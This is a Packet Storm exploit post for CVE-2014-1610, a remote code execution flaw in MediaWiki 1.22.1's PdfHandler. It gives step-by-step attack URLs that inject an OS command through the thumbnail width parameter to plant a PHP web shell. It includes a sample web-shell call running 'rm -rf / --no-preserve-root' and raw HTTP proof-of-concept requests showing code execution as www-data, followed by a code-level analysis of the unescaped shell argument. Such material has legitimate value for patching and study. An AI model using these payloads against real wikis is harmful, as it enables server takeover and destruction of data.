exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

MediaWiki 1.22.1 PdfHandler Remote Code Execution

MediaWiki 1.22.1 PdfHandler Remote Code Execution
Posted Feb 3, 2014
Authored by Xelenonz, Pichaya Morimoto

MediaWiki versions 1.22.1 and below PdfHandler remote code execution exploit.

tags | exploit, remote, code execution
advisories | CVE-2014-1610
SHA-256 | b8f79be011bdbd02e08ab7955ce6c1818acfb3f8c4507dda03c263a152a80c2f

MediaWiki 1.22.1 PdfHandler Remote Code Execution

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

####################################################################
#
# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit
(CVE-2014-1610)
# Reported by Netanel Rubin - Check Point’s Vulnerability Research Group
(Jan 19, 2014)
# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014)
# Affected website : Wikipedia.org and more !
#
# Exploit author : Xelenonz & @u0x (Pichaya Morimoto)
# Release dates : Feb 1, 2014
# Special Thanks to 2600 Thailand !
#
####################################################################

# Exploit:
####################################################################
1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)
http://vulnerable-site/index.php/Special:Upload
2. inject os cmd to upload a php-backdoor
http://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20
"<?php%20system(\\$_GET[1]);">images/xnz.php`
3. access to php-backdoor!
http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root
4. happy pwning!!


# Related files:
####################################################################
thumb.php <-- extract all _GET array to params
/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width
options
/includes/media/ImageHandler.php
/includes/GlobalFunctions.php
/includes/filerepo/file/File.php

# Vulnerability Analysis:
####################################################################
1. thumb.php
This script used to resize images if it is configured to be done
when the web browser requests the image
<? ...
1.1 Called directly, use $_GET params
wfThumbHandleRequest();
1.2 Handle a thumbnail request via query parameters
function wfThumbHandleRequest() {
$params = get_magic_quotes_gpc()
? array_map( 'stripslashes', $_GET )
: $_GET; << WTF

wfStreamThumb( $params ); // stream the thumbnail
}
1.3 Stream a thumbnail specified by parameters
function wfStreamThumb( array $params ) {
...
$fileName = isset( $params['f'] ) ? $params['f'] : ''; // << puts
uploaded.pdf file here
...
// Backwards compatibility parameters
if ( isset( $params['w'] ) ) {
$params['width'] = $params['w']; // << Inject os cmd here!
unset( $params['w'] );
}
...
$img = wfLocalFile( $fileName );
...
// Thumbnail isn't already there, so create the new thumbnail...
$thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image
by width/height
...
// Stream the file if there were no errors
$thumb->streamFile( $headers );
...
?>
2. /includes/filerepo/file/File.php
<? ...
function transform( $params, $flags = 0 ) { ...
$handler = $this->getHandler(); // << PDF Handler
...
$normalisedParams = $params;
$handler->normaliseParams( $this, $normalisedParams );
...
$thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );
..
?>
3. /extensions/PdfHandler/PdfHandler_body.php
<? ...
function doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) {
...
$width = $params['width'];
...
$cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd &
parameters
$cmd .= " -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page}
-dLastPage={$page}";
$cmd .= " -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q ". wfEscapeShellArg(
$srcPath );
$cmd .= " | " . wfEscapeShellArg( $wgPdfPostProcessor );
$cmd .= " -depth 8 -resize {$width} - "; // << FAILED to escape shell
argument
$cmd .= wfEscapeShellArg( $dstPath ) . ")";
$cmd .= " 2>&1";
...
$err = wfShellExec( $cmd, $retval );
...
?>
4. /includes/GlobalFunctions.php
Execute a shell command, with time and memory limits
<? ...
function wfShellExec( $cmd, &$retval = null, $environ = array(), $limits =
array() ) {
...
passthru( $cmd, $retval ); // << Execute here!!

# Proof-Of-Concept
####################################################################
GET
/mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C?php%20system(\\$_GET[1]);%22%3Eimages/longcat.php`
HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: my_wikiUserID=2; my_wikiUserName=Longcat;
my_wiki_session=op3h2huvddnmg7gji0pscfsg02

<html><head><title>Error generating thumbnail</title></head>
<body>
<h1>Error generating thumbnail</h1>
<p>
เกิดปัญหาไม่สามารถทำรูปย่อได้: /bin/bash: -: command not found<br />
convert: option requires an argument `-resize' @
error/convert.c/ConvertImageCommand/2380.<br />
GPL Ghostscript 9.10: Unrecoverable error, exit code 1<br />

</p>

</body>
</html>


GET /mediawiki1221/images/longcat.php?1=id HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2;
my_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1

uid=33(www-data) gid=33(www-data) groups=33(www-data)


# Back-end $cmd
####################################################################
GlobalFunctions.php : wfShellExec()
cmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150
-dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' |
'/usr/bin/convert' -depth 8 -resize 10|`echo "<?php
system(\\$_GET[1]);">images/longcat.php` -
'/tmp/transform_0e377aad0e27-1.jpg') 2>&1

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.14 (GNU/Linux)

iQIcBAEBAgAGBQJS7SLLAAoJEB2kHapd1XMU8BcP/A+hMUw/EDwChN+2XjtExVGU
BzPrpXXBbp6WGWkeztmrT78Y1b1lXX/cQA4V9IGrdHUEdgG0p3y476d7eZ5sPxVf
ny9Xg7o4WtMgmSvSOOc+lCsy9aAKab801cs1HLbwZokwK8ItwQQoGfik0BgNQ4l1
mijELis1z1f3k6yJ9/OJicnIJDmHIzPL9wQyr2A5c+jjz74SR//SlQPrqDbvEpj2
uCCpTpjf6LGYCzyGmqROlf+OxFTeXdB9oghButrEtQ9w6qGQg1/UZjmbx/xLkCqb
GO1R4qs0PuV4uepwcbLzDDWW5kPejPjcwpuyjrpQO45OcIUtkvzR4iypCxxkvktv
n2l09Dtn9HqbK3QXhTb2u3uhM9RyJd7kFKhfmZ85OnvMmYvaXSeDWs7Wd9GEO5wh
FXbhL9O2u/bqiabQKnsJ6bx8hcm2a9mO+/yJZUyBXybHrjseRD4LQFWUYR/WPAQt
vuICIQyO5pcjkIib+0DN4e7xcFMYuo3o6WkSZuZT+l0LwYDVmhUbaGAEP13+dWZZ
M0HGoI7AITsqukYFH1n7NYjJazF3Bckc0iJbCrI39TYkvr3V9bRWSEfVBM6FcBan
kumwDlzYP/301fsKGLtfsnUmK2qkj1EF3DVoJbZ5VFdgiUSlCMsbp9qdGfUPbelR
2LmeyQR2rzjBB7Sovvcn
=ooEs
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close